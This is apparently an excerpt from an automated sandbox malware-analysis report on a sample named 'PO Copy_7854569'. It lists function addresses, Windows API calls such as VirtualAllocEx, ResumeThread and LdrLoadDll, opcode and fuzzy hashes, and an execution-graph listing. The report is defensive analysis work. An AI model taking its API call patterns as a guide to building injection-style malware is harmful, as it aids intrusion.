                            • String ID:
                            • API String ID: 4275171209-0
                            • Opcode ID: 3b1e0cda8f7a02f296bbc1a628e05cf139c86f5a45a915efb9bd49ebc52b16e5
                            • Instruction ID: 0d7ae0875554a506cddf67b692f5f8d8a2fa80b6a1dee350489917e064a86852
                            • Opcode Fuzzy Hash: 3b1e0cda8f7a02f296bbc1a628e05cf139c86f5a45a915efb9bd49ebc52b16e5
                            • Instruction Fuzzy Hash: CF1147B58002499BCB10DFAAC844AEEFFF5FF49310F10881AE559A7250C739A545CFA0
                            Function 016BABB0 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                            Download Yara Rule
                            APIs
                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,016BB479,00000800,00000000,00000000), ref: 016BB68A
                            Memory Dump Source
                            • Source File: 00000000.00000002.1984416466.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16b0000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID: LibraryLoad
                            • String ID:
                            • API String ID: 1029625771-0
                            • Opcode ID: c1b9573b0c80abdd7b3414c58c1f095ea8297990246ee0f7d82dc4ee79952906
                            • Instruction ID: e975f4c895ca03777ffca8b67db874aa336109b2a6a60f006e0741ada84b1bd5
                            • Opcode Fuzzy Hash: c1b9573b0c80abdd7b3414c58c1f095ea8297990246ee0f7d82dc4ee79952906
                            • Instruction Fuzzy Hash: EB1126B6C003588FDB10DF9AC884ADEFBF4EB48310F10842AD519A7310D379A945CFA5
                            Function 016BB619 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                            Download Yara Rule
                            APIs
                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,016BB479,00000800,00000000,00000000), ref: 016BB68A
                            Memory Dump Source
                            • Source File: 00000000.00000002.1984416466.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16b0000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID: LibraryLoad
                            • String ID:
                            • API String ID: 1029625771-0
                            • Opcode ID: 78bdbf1cd9739dad7d25d7e3d837461801264a8b1fef0533d18ebbbec1bb09d0
                            • Instruction ID: 4d0ff1d1b8b05191c10747ab7cd76568b9afba858e27010c037d0b0b50c4b548
                            • Opcode Fuzzy Hash: 78bdbf1cd9739dad7d25d7e3d837461801264a8b1fef0533d18ebbbec1bb09d0
                            • Instruction Fuzzy Hash: 221112B68002588FDB10DFAAC884ADEFFF4EB49710F14842AD959A7310C379A945CFA5
                            Function 076E8BA8 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                            Download Yara Rule
                            APIs
                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 076E8C16
                            Memory Dump Source
                            • Source File: 00000000.00000002.2001732445.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_76e0000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID: AllocVirtual
                            • String ID:
                            • API String ID: 4275171209-0
                            • Opcode ID: a9114b771956432b19a86bf8aee157fec806f84817f95aca94054482d9b186d4
                            • Instruction ID: 076c846f8ca1d8ff89f9442870ecf57eae077071b8ac4d669dba7a4b0d65907c
                            • Opcode Fuzzy Hash: a9114b771956432b19a86bf8aee157fec806f84817f95aca94054482d9b186d4
                            • Instruction Fuzzy Hash: D71126B58002499FCB10DFAAC844AEEFFF5EF49310F108819E519A7250C779A544CFA1
                            Function 076E85E0 Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.2001732445.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_76e0000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID: ResumeThread
                            • String ID:
                            • API String ID: 947044025-0
                            • Opcode ID: 245ea18465eabd9389f033d8a7c88aec23d33be4abf795e9677b9d30690685d7
                            • Instruction ID: 00acaf1ebbb55ab79e35e50d3f145727189569f9e58c5f3bd47577fa1f28a84b
                            • Opcode Fuzzy Hash: 245ea18465eabd9389f033d8a7c88aec23d33be4abf795e9677b9d30690685d7
                            • Instruction Fuzzy Hash: 241146B590024A8ECB10DFA9C5457EEFBF9BF88324F20881AC519A7250C738A645CFA4
                            Function 076E85E8 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.2001732445.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_76e0000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID: ResumeThread
                            • String ID:
                            • API String ID: 947044025-0
                            • Opcode ID: c6edf6914647e1975f374eef128e488137763154f049c04e07f996f5d3f0c5b4
                            • Instruction ID: b165c2e67ac9bfd0951b1371a9d7ca14aa9c59a91dd28bafac99cc897e6d8212
                            • Opcode Fuzzy Hash: c6edf6914647e1975f374eef128e488137763154f049c04e07f996f5d3f0c5b4
                            • Instruction Fuzzy Hash: BA1158B19002498FCB20DFAAC4447AEFBF8EF88314F208419C519A7240CB38A544CBA5
                            Function 016BB6C1 Relevance: 1.5, APIs: 1, Instructions: 48libraryCOMMON
                            Download Yara Rule
                            APIs
                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,016BB479,00000800,00000000,00000000), ref: 016BB68A
                            Memory Dump Source
                            • Source File: 00000000.00000002.1984416466.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16b0000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID: LibraryLoad
                            • String ID:
                            • API String ID: 1029625771-0
                            • Opcode ID: 02cde601ddaace2d0fe423cf3a737abc8690c87b71e84668b5cb4e9ab069ee66
                            • Instruction ID: b711c7d9e06d24a353f99259ea5de30cb8a7c3dd6d46e9ce3a62de19c374fded
                            • Opcode Fuzzy Hash: 02cde601ddaace2d0fe423cf3a737abc8690c87b71e84668b5cb4e9ab069ee66
                            • Instruction Fuzzy Hash: 4F01F1728043548FDB118FACD8487DABFF0EF5A720F04809AD148DB251C3799885CBA5
                            Function 016BB398 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                            Download Yara Rule
                            APIs
                            • GetModuleHandleW.KERNELBASE(00000000), ref: 016BB3FE
                            Memory Dump Source
                            • Source File: 00000000.00000002.1984416466.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16b0000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID: HandleModule
                            • String ID:
                            • API String ID: 4139908857-0
                            • Opcode ID: 23c0a6d873518bc2e1b39c34e22526b491c125bbcbcf56692684d62b61bdab5f
                            • Instruction ID: 803ff64ad3183d6f3d1af49bb69fe11e2a6819734a791bee1b6472ddd312f2bb
                            • Opcode Fuzzy Hash: 23c0a6d873518bc2e1b39c34e22526b491c125bbcbcf56692684d62b61bdab5f
                            • Instruction Fuzzy Hash: DC110FB5C002498FDB10DF9AC884ADEFBF4EF88214F10842AD919A7214C379A545CFA1
                            Function 076E9E6C Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                            Download Yara Rule
                            APIs
                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 076EBCF5
                            Memory Dump Source
                            • Source File: 00000000.00000002.2001732445.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_76e0000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID: MessagePost
                            • String ID:
                            • API String ID: 410705778-0
                            • Opcode ID: f218dcb03ff3be20f2f3913f073ef1ee90198f28a835914ab6fbd91b840b55f2
                            • Instruction ID: 6685ccd64a3f81987b7c9f892d0b854fd097f2b3fe727f6c61bc821c6e29d6b6
                            • Opcode Fuzzy Hash: f218dcb03ff3be20f2f3913f073ef1ee90198f28a835914ab6fbd91b840b55f2
                            • Instruction Fuzzy Hash: 431103B58043499FDB20DF9AC548BDEFBF8FB48314F10845AE959A7210C379A984CFA5
                            Function 076EBC92 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                            Download Yara Rule
                            APIs
                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 076EBCF5
                            Memory Dump Source
                            • Source File: 00000000.00000002.2001732445.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_76e0000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID: MessagePost
                            • String ID:
                            • API String ID: 410705778-0
                            • Opcode ID: 41eaf3c6a70e1489b7c8171b719285c6f2299fe35c3e5b88754980a9e701a46d
                            • Instruction ID: a29e3c86ce8362803c054047f673667c247d6eadf49ac3754c327346581ef302
                            • Opcode Fuzzy Hash: 41eaf3c6a70e1489b7c8171b719285c6f2299fe35c3e5b88754980a9e701a46d
                            • Instruction Fuzzy Hash: EA1103B58003499FDB10DF99C585BDEFBF8FB48310F20880AD559A7610C378A684CFA1
                            Function 0147D4C4 Relevance: .1, Instructions: 75COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1983332920.000000000147D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0147D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_147d000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9af84c24d2dbd9cd87ddfb45091d0d11bb7674ef351b21bb19b43ed08dbe314d
                            • Instruction ID: 8f6b4a6474f0d94dc25b4ed0de61be79e8bc8ab2c887f395b03a81a1d9765ec6
                            • Opcode Fuzzy Hash: 9af84c24d2dbd9cd87ddfb45091d0d11bb7674ef351b21bb19b43ed08dbe314d
                            • Instruction Fuzzy Hash: 4921F171910240DFDB15DF58D980B67BF65FF88318F24C56AE9090A266C33AD416CAA2
                            Function 0147D3D8 Relevance: .1, Instructions: 75COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1983332920.000000000147D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0147D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_147d000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 659a85f4a931eaf3382d4f7a8c5ff329186dd7242ba261f534f4e34ae4a0247e
                            • Instruction ID: 1c33bfbcaa422cbc8828fe6c4c343710f1c1d69ef0c2603e833d2adf84e3847e
                            • Opcode Fuzzy Hash: 659a85f4a931eaf3382d4f7a8c5ff329186dd7242ba261f534f4e34ae4a0247e
                            • Instruction Fuzzy Hash: 3B21F471910204DFDB05DF58D9C0B96BF65FF98324F20C57AD9090B366C33AE456CAA1
                            Function 0148D01C Relevance: .1, Instructions: 72COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1983904209.000000000148D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0148D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_148d000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4449fcaf07e345c38553f0ba671a13c262a2b1621f7f06a829829b03a60ff5ff
                            • Instruction ID: 2c94dcf42349a0a8619776e62a5c9145e241b978a03426e459f94a3e3d9f7ac4
                            • Opcode Fuzzy Hash: 4449fcaf07e345c38553f0ba671a13c262a2b1621f7f06a829829b03a60ff5ff
                            • Instruction Fuzzy Hash: 472125B1904204DFDB15EFA8D980B1ABF65FB85318F20C56ED90A4B3A6C33AD407CA61
                            Function 0148D006 Relevance: .1, Instructions: 62COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1983904209.000000000148D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0148D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_148d000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: dfd6a1ceda702198ae065580f12ee77eb564d9057799227d34af6261a16e0d64
                            • Instruction ID: 010913378c21f9d4b83ae32df67311583dfee96e9087cd01eea8ebee5eeaa52c
                            • Opcode Fuzzy Hash: dfd6a1ceda702198ae065580f12ee77eb564d9057799227d34af6261a16e0d64
                            • Instruction Fuzzy Hash: 062180755093808FDB03DF64D594716BF71EB46214F28C5DBD8498B2A7C33A980BCB62
                            Function 0147D3D3 Relevance: .1, Instructions: 56COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1983332920.000000000147D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0147D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_147d000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                            • Instruction ID: 2a1f0a1adcc082f9fe24618bd7b9c15275502629b0b254fabf9fee3afe341d56
                            • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                            • Instruction Fuzzy Hash: 1511C072804240DFDB12CF44D5C4B56BF61FB84224F24C6AAD9090A266C33AD456CBA1
                            Function 0147D4BF Relevance: .1, Instructions: 56COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1983332920.000000000147D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0147D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_147d000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                            • Instruction ID: eb31a51f6ce2353f94e9cf3d9b0dc3b4dad9f44c5d38eec892fa26cf56e3290c
                            • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                            • Instruction Fuzzy Hash: 9D11DF72804280CFCB12CF54D9C4B56BF71FB88324F24C6AAD9490B266C336D45ACBA2
                            Function 0147D759 Relevance: .0, Instructions: 45COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1983332920.000000000147D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0147D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_147d000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f7944463a2c899116b93f796b7409bf95a3667f7460fd4eee909bed6175c2141
                            • Instruction ID: 64556a815afdb343fefbed796d45f0a6c9bb3fde664c812ac67bd2f6a5e65b59
                            • Opcode Fuzzy Hash: f7944463a2c899116b93f796b7409bf95a3667f7460fd4eee909bed6175c2141
                            • Instruction Fuzzy Hash: FC01DB714153849AE7209B9DCD84BA7FF9CEF45324F18C82BED090A3AAC3799845CA71
                            Function 0147D758 Relevance: .0, Instructions: 36COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1983332920.000000000147D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0147D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_147d000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b70ba345339078f8d8af6b3761979c7cadf93f0f8370b852b790c7e37ea21c8c
                            • Instruction ID: 44f3118b64edb9e4ac6ee9405dadcc1bf0782d7e159987209326b6cf2822df9e
                            • Opcode Fuzzy Hash: b70ba345339078f8d8af6b3761979c7cadf93f0f8370b852b790c7e37ea21c8c
                            • Instruction Fuzzy Hash: CAF0C2714053849EE7208B0ACC84BA3FFA8EF45624F18C45AED480A396C2799844CAB1

                            Non-executed Functions

                            Function 076ED970 Relevance: 1.7, Strings: 1, Instructions: 440COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2001732445.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_76e0000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID: }Y<
                            • API String ID: 0-4108299924
                            • Opcode ID: faf5a07a911c19a6e5366ecebaeac14e90f948d0584fac06c16e2a92e0338250
                            • Instruction ID: cf0d073be7b263c661b18ee072fddf98eb5afd34030bc72dc334405346b1401b
                            • Opcode Fuzzy Hash: faf5a07a911c19a6e5366ecebaeac14e90f948d0584fac06c16e2a92e0338250
                            • Instruction Fuzzy Hash: A3F1ABB1B027069FDB19DBB5C8907AEB7FAAF89200F14846DC006DB390DB34D942CB61
                            Function 076E8698 Relevance: .3, Instructions: 312COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2001732445.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_76e0000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e53d202bb92c8e1f4982e09a78dec352055e2721d368f8ee7e140e5148446d8e
                            • Instruction ID: 5f0471e6f48cb9049e9b73cb27d49644e3c2bcddd917f3d9b7f8e9b07a022b40
                            • Opcode Fuzzy Hash: e53d202bb92c8e1f4982e09a78dec352055e2721d368f8ee7e140e5148446d8e
                            • Instruction Fuzzy Hash: EFE139B4E0111A8FCB14DFA9C5809AEFBB6FF89304F248169D815AB356D730AD81CF61
                            Function 076E62E0 Relevance: .3, Instructions: 312COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2001732445.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_76e0000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2846d3827577ebdb5421f8794c60b6a11ebd15d86663f17626debe855d0c1d81
                            • Instruction ID: b265220a55642970f18fb31e97090c0889a491ca73f2ce1b948c60fe0bb28b38
                            • Opcode Fuzzy Hash: 2846d3827577ebdb5421f8794c60b6a11ebd15d86663f17626debe855d0c1d81
                            • Instruction Fuzzy Hash: 84E126B4E012198FCB14DFA9C5809AEFBB6FF89305F248169D415AB356D730AD82CF61
                            Function 076E5EA8 Relevance: .3, Instructions: 312COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2001732445.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_76e0000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 11d93bcb96e575113eba16c4c3cde95b0c7ebad4122df48a3593f35a50b1cf0f
                            • Instruction ID: b32487513f85f56369f81e68b8475c5d381a80ae865df6156d55b215bfb2d307
                            • Opcode Fuzzy Hash: 11d93bcb96e575113eba16c4c3cde95b0c7ebad4122df48a3593f35a50b1cf0f
                            • Instruction Fuzzy Hash: EFE137B4E011198FCB14DFA9C5809AEFBB6FF89305F248169D415AB356D730AD82CFA1
                            Function 076E7DC0 Relevance: .3, Instructions: 312COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2001732445.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_76e0000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: afafea0f6f8423dc7dfd6f176bffb460fdd743fae1e5c7badae68978f168d64d
                            • Instruction ID: 14e97a0b2a6765cc67c5ab32786bdac9017607e0acac6f822728bd045b6b8f75
                            • Opcode Fuzzy Hash: afafea0f6f8423dc7dfd6f176bffb460fdd743fae1e5c7badae68978f168d64d
                            • Instruction Fuzzy Hash: 8DE117B4E0111A8FDB14DFA9C5809AEBBF6FF89305F248169D415AB356D730AD82CF60
                            Function 076E7988 Relevance: .3, Instructions: 312COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2001732445.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_76e0000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 021d65cc9858bb5fbbaa34d09a4b4c769d83900e725c3a9abcec593a51be6c48
                            • Instruction ID: 7a1cbf268731baa1e4b78198fd3b809532193d2ac6a83ecdda76552870f95bbe
                            • Opcode Fuzzy Hash: 021d65cc9858bb5fbbaa34d09a4b4c769d83900e725c3a9abcec593a51be6c48
                            • Instruction Fuzzy Hash: 92E117B4E011198FDB14DFA9C5809AEFBB6FF89305F248169D415AB356D730AD82CFA0
                            Function 016BDFCC Relevance: .3, Instructions: 264COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1984416466.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16b0000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ff02c87e9f145e58d00623b293d59b2023d0074885fe7616c29b2756ed92f092
                            • Instruction ID: becdb16fb81c134edd62790d09572f3a254fdec9c0941c5cf25586e358966346
                            • Opcode Fuzzy Hash: ff02c87e9f145e58d00623b293d59b2023d0074885fe7616c29b2756ed92f092
                            • Instruction Fuzzy Hash: 28A15F32E002158FCF19DFB5CC805DEBBB2FF85300B1545AAE906AB265DB32D995CB40
                            Function 076E5E9A Relevance: .1, Instructions: 133COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2001732445.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_76e0000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b8b2e4f299081a0e6b3684256c9a8c55ce3adf44484f9a6a0ab774e92fe90f8c
                            • Instruction ID: 053085a43a51bb17e91f53c1792afa26b4f20a9e24f69c4ef2afecf0e15c24f6
                            • Opcode Fuzzy Hash: b8b2e4f299081a0e6b3684256c9a8c55ce3adf44484f9a6a0ab774e92fe90f8c
                            • Instruction Fuzzy Hash: CB513BB4E012198FDB14CFA9C9805AEFBB6FF89305F248169D419AB356D7309A41CFA1
                            Function 076E7DBB Relevance: .1, Instructions: 128COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2001732445.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_76e0000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ed063195d0ad3a513e5d9f8ae335d75cc3e744a3bd787a889672c955f3fe6fff
                            • Instruction ID: 05063d3fb8faaceab4fa2fccb582488461a974dd12ecbd11199c07726bbf931b
                            • Opcode Fuzzy Hash: ed063195d0ad3a513e5d9f8ae335d75cc3e744a3bd787a889672c955f3fe6fff
                            • Instruction Fuzzy Hash: F65117B4E012198BDB14CFA9C9805AEBBF6EF89305F24C1A9D419A7356D7309E42CF61

                            Execution Graph

                            Execution Coverage:1.1%
                            Dynamic/Decrypted Code Coverage:5.4%
                            Signature Coverage:8.5%
                            Total number of Nodes:130
                            Total number of Limit Nodes:8
                            execution_graph 94834 423c43 94835 423c5f 94834->94835 94836 423c87 94835->94836 94837 423c9b 94835->94837 94838 42ae13 NtClose 94836->94838 94844 42ae13 94837->94844 94840 423c90 94838->94840 94841 423ca4 94847 42ce03 RtlAllocateHeap 94841->94847 94843 423caf 94845 42ae30 94844->94845 94846 42ae41 NtClose 94845->94846 94846->94841 94847->94843 94848 42ddc3 94849 42ddd3 94848->94849 94850 42ddd9 94848->94850 94853 42cdc3 94850->94853 94852 42ddff 94856 42b113 94853->94856 94855 42cdde 94855->94852 94857 42b12d 94856->94857 94858 42b13e RtlAllocateHeap 94857->94858 94858->94855 94956 42a453 94957 42a46d 94956->94957 94960 1672df0 LdrInitializeThunk 94957->94960 94958 42a495 94960->94958 94961 423fd3 94964 423fe2 94961->94964 94962 424026 94963 42cce3 RtlFreeHeap 94962->94963 94965 424036 94963->94965 94964->94962 94966 424067 94964->94966 94968 42406c 94964->94968 94967 42cce3 RtlFreeHeap 94966->94967 94967->94968 94969 413873 94970 41388d 94969->94970 94975 417253 94970->94975 94972 4138ab 94973 4138f0 94972->94973 94974 4138df PostThreadMessageW 94972->94974 94974->94973 94976 417277 94975->94976 94977 4172b3 LdrLoadDll 94976->94977 94978 41727e 94976->94978 94977->94978 94978->94972 94979 41a8d3 94980 41a917 94979->94980 94981 41a938 94980->94981 94982 42ae13 NtClose 94980->94982 94982->94981 94983 41d9f3 94984 41da19 94983->94984 94988 41db07 94984->94988 94989 42def3 94984->94989 94986 41daab 94987 42a4a3 LdrInitializeThunk 94986->94987 94986->94988 94987->94988 94990 42de63 94989->94990 94991 42cdc3 RtlAllocateHeap 94990->94991 94992 42dec0 94990->94992 94993 42de9d 94991->94993 94992->94986 94994 42cce3 RtlFreeHeap 94993->94994 94994->94992 94859 1672b60 LdrInitializeThunk 94995 418458 94996 42ae13 NtClose 94995->94996 94997 418462 94996->94997 94860 401b2c 94861 401b41 94860->94861 94864 42e283 94861->94864 94867 42c8d3 94864->94867 94868 42c8f9 94867->94868 94879 407253 94868->94879 94870 42c90f 94878 401bce 94870->94878 94882 41a6e3 94870->94882 94872 42c92e 94873 42c943 94872->94873 94897 42b1b3 94872->94897 94893 426ef3 94873->94893 94876 42c952 94877 42b1b3 ExitProcess 94876->94877 94877->94878 94900 415f83 94879->94900 94881 407260 94881->94870 94883 41a70f 94882->94883 94924 41a5d3 94883->94924 94886 41a73c 94888 42ae13 NtClose 94886->94888 94890 41a747 94886->94890 94887 41a770 94887->94872 94888->94890 94889 41a754 94889->94887 94891 42ae13 NtClose 94889->94891 94890->94872 94892 41a766 94891->94892 94892->94872 94894 426f4d 94893->94894 94896 426f5a 94894->94896 94935 417da3 94894->94935 94896->94876 94898 42b1d0 94897->94898 94899 42b1e1 ExitProcess 94898->94899 94899->94873 94901 415f9a 94900->94901 94903 415fb3 94901->94903 94904 42b853 94901->94904 94903->94881 94906 42b86b 94904->94906 94905 42b88f 94905->94903 94906->94905 94911 42a4a3 94906->94911 94912 42a4bd 94911->94912 94918 1672c0a 94912->94918 94913 42a4e9 94915 42cce3 94913->94915 94921 42b163 94915->94921 94917 42b8fd 94917->94903 94919 1672c11 94918->94919 94920 1672c1f LdrInitializeThunk 94918->94920 94919->94913 94920->94913 94922 42b17d 94921->94922 94923 42b18e RtlFreeHeap 94922->94923 94923->94917 94925 41a6c9 94924->94925 94926 41a5ed 94924->94926 94925->94886 94925->94889 94930 42a543 94926->94930 94929 42ae13 NtClose 94929->94925 94931 42a560 94930->94931 94934 16735c0 LdrInitializeThunk 94931->94934 94932 41a6bd 94932->94929 94934->94932 94937 417dcd 94935->94937 94936 41823b 94936->94896 94937->94936 94943 4139a3 94937->94943 94939 417eda 94939->94936 94940 42cce3 RtlFreeHeap 94939->94940 94941 417ef2 94940->94941 94941->94936 94942 42b1b3 ExitProcess 94941->94942 94942->94936 94945 4139c2 94943->94945 94944 413ae0 94944->94939 94945->94944 94947 4133f3 94945->94947 94948 41340f 94947->94948 94951 42b083 94948->94951 94952 42b09d 94951->94952 94955 1672c70 LdrInitializeThunk 94952->94955 94953 413415 94953->94944 94955->94953

                            Executed Functions

                            Function 00417253 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 46 417253-41726f 47 417277-41727c 46->47 48 417272 call 42d9e3 46->48 49 417282-417290 call 42df03 47->49 50 41727e-417281 47->50 48->47 53 4172a0-4172b1 call 42c3a3 49->53 54 417292-41729d call 42e1a3 49->54 59 4172b3-4172c7 LdrLoadDll 53->59 60 4172ca-4172cd 53->60 54->53 59->60
                            APIs
                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004172C5
                            Memory Dump Source
